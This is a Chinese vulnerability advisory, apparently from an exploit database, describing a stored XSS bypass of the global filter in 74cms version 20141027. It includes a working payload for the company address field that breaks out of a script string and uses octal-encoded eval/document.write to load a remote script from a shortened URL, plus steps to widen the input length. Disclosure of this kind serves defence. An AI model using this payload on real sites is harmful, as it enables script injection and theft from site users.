74cms(20141027)全局xss防护考虑不完善可被绕过

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 74cms(20141027)全局xss防护考虑不完善可被绕过 ### 详细说明: 防护代码就不贴出来了, 代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。 但是没有考虑下面这种的情况 ``` <script> Var xx=”qiyeid”; </script> ``` 这样的话,我们就可以这样利用 ``` <script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// </script> ``` ### 漏洞证明: 正好找到了一处存储xss。 直接贴利用方法 先来注册一个企业帐号 [<img src="https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png) http://localhost/74/user/company/company_info.php?act=company_profile 重点利用在详细地址这,不过我们需要设置一下input的长度大一点 。默认长度为80,但是数据库中为250。 然后插上我们的代码。 ``` ",opts);eval('document.write("\74\163cript/\163rc=//t.cn/*****\76\74/\163cript\76")')// ``` [<img src="https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png" alt="图片2.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息